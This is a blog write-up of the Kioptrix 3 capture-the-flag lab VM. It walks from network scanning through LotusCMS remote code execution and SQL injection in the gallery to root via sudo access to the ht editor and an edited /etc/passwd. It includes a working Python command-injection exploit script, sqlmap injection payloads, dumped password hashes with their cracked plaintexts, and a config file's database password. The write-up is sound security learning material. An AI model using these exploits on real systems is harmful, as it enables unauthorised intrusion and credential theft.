Home Kioptrix 3
Post
Cancel

Kioptrix 3

Posted Sep 22, 2023 Updated Oct 20, 2023
By KS
11 min read

Machine Information

Host Discovery

Lets start by getting the IP address of the target machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

nmap -sP 192.168.47.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 13:21 +08
Nmap scan report for LAPTOP-KS (192.168.47.1)
Host is up (0.00092s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.00022s latency).
MAC Address: 00:50:56:F1:F1:08 (VMware)
Nmap scan report for 192.168.47.159
Host is up (0.00030s latency).
MAC Address: 00:0C:29:E2:AE:FD (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:F1:AE:8C (VMware)
Nmap scan report for 192.168.47.135
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.12 seconds

Based on the result, the target machine’s IP address is 192.168.47.159.

Information Gathering

After getting the IP address, the next thing that I do is scan for open ports

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

nmap -p- -T4 -A 192.168.47.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 13:22 +08
Nmap scan report for 192.168.47.159
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 00:0C:29:E2:AE:FD (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.87 ms 192.168.47.159

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.14 seconds

Based on the result, there are only 2 ports opened which is port 22 and port 80. I usually started off with port 80 as it is a web application.

Exploiting Port 80

I started off by exploring the web application and look for interesting information.

Based on the home page, there are blog and login pages which might be showing useful information.

Based on the blog and login page, there are some useful information that is useful. In the blog page, there is a link given related to gallery and a potential username loneferret. As for login page, it is powered by LotusCMS which could be used to check existing exploit.

Exploiting LotusCMS

After checking out LotusCMS, there is a existing exploit which to perform RCE.

Based on the POC, I decided to create a random python script to exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

#!/bin/python3

import requests

link = "http://192.168.47.159/"

while True:
    command = input("# ")
    if command == "exit":
        exit(0)

    inject = "index');${system('"+command+"')};#"
    res = requests.post(link+"index.php", data={'page': inject})
    
    result = res.text.split("</html>")
    print(result[1])

Here’s the result of the script.

1
2
3

./python.py 
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The script that I wrote is not able to perform reverse shell. To get reverse shell, just run POC above and inject the reverse shell command.

Based on previous information, there is a link given in the blog page. Since it is using domain name, I added the domain name into my /etc/hosts file.

1
2
3
4
5
6
7
8

cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

192.168.47.159  kioptrix3.com

After adding into the file, I started off by exploring their home page for gathering information.

After playing and clicking each link, I found a interesting page where it has a dropdown menu for sorting purposes.

After understanding the purpose of the dropdown menu and how it works, the url link is constantly changing depending on the dropdown menu. With that, I suspected that it might be interacting with SQL query which might be vulnerable to SQL injection as well.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.8#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:46:25 /2023-09-09/

[15:46:25] [INFO] resuming back-end DBMS 'mysql' 
[15:46:25] [INFO] testing connection to the target URL
[15:46:25] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=424532800ea...bab17e74a3'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7811=7811) THEN 1 ELSE (SELECT 3414 UNION SELECT 3887) END))&sort=photoid

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=1 OR ROW(8245,9018)>(SELECT COUNT(*),CONCAT(0x71787a7171,(SELECT (ELT(8245=8245,1))),0x7176716271,FLOOR(RAND(0)*2))x FROM (SELECT 4173 UNION SELECT 5155 UNION SELECT 3005 UNION SELECT 3157)a GROUP BY x)&sort=photoid

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 4303 FROM (SELECT(SLEEP(5)))bYFu)&sort=photoid

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71787a7171,0x6647416d6c7158745659745245784a45426449434a4f52647943685056687371554762767379566f,0x7176716271),NULL,NULL,NULL,NULL,NULL-- -&sort=photoid
---
[15:46:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[15:46:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[15:46:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'

[*] ending @ 15:46:28 /2023-09-09/

Based on the result, it is proven that the url is vulnerable to SQL injection. With that, I dumped out the database and managed to get some useful information.

1
2
3
4

cat /root/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv 
id,password,username
1,0d3eccfb887aabd50f243b3f155c0f85 (Mast3r),dreg
2,5badcaf789d3d1d09794d8f021f40f0e (starwars),loneferret

Based on the given credentials, there are several things that I could used such as login into the web application or login into ssh with the credentials. After trying, I managed to login into ssh with the credentials given.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@192.168.47.159
The authenticity of host '192.168.47.159 (192.168.47.159)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.47.159' (RSA) to the list of known hosts.
loneferret@192.168.47.159's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README

Privilege Escalation

Based on the first exploit, I am currently in a reverse shell with user www-data. I started off looking for config files to check for potential credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

cat ./gallery/gconfig.php
<?php
        error_reporting(0);
        /*
                A sample Gallarific configuration file. You should edit
                the installer details below and save this file as gconfig.php
                Do not modify anything else if you don't know what it is.
        */

        // Installer Details -----------------------------------------------

        // Enter the full HTTP path to your Gallarific folder below,
        // such as http://www.yoursite.com/gallery
        // Do NOT include a trailing forward slash

        $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

        $GLOBALS["gallarific_mysql_server"] = "localhost";
        $GLOBALS["gallarific_mysql_database"] = "gallery";
        $GLOBALS["gallarific_mysql_username"] = "root";
        $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

        // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
                echo("A connection to the database couldn't be established: " . mysql_error());
                die();
}else {
        if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
                echo("The Gallarific database couldn't be opened: " . mysql_error());
                die();
        }else {
                $settings=mysql_query("select * from gallarific_settings");
                if(mysql_num_rows($settings)!=0){
                        while($data=mysql_fetch_array($settings)){
                                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
                        }
                }

        }
}

Based on the result, I managed to get credentials for the database. With the credentials, I could just login into their database and get useful information.

After login into their database, I could get the same information that I got in the second exploit which is username and password in hash.

After login into ssh as user loneferret, I started out by checking and admin privileges.

1
2
3
4

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

There is a interesting command that we could used with admin privilege. After understanding ht, it is like a text or hex editor which I could modify files. Since admin privileges is given for command ht, I could just edit the /etc/passwd files and login as root.

1
2
3
4

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

When I run the command, it mentioned that there is a error opening terminal. I just changed the terminal to others by using the command export TERM=xterm. After changing it, ht command works as usual.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

loneferret@Kioptrix3:~$ cat /etc/passwd
root:$1$NM/gElyM$Cer8AFPFO/n93M5jwe.z8/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

After changing the /etc/passwd file with ht command, I could just login with the new credentials that I set

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

loneferret@Kioptrix3:~$ su root
Password: 
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)

root@Kioptrix3:/home/loneferret# cat /root/Congrats.txt 
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

With this, I successfully get root account.

Things i learned from the machine

  • There might be more than one exploit in the target machine
  • Writing my own exploit based on the POC
  • Always click all the link
  • Checking config files is also important
  • Privilege Escalation by modifying /etc/passwd file
Vulnhub
boot2root Kioptrix
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

Kioptrix 2

Scrambled Egg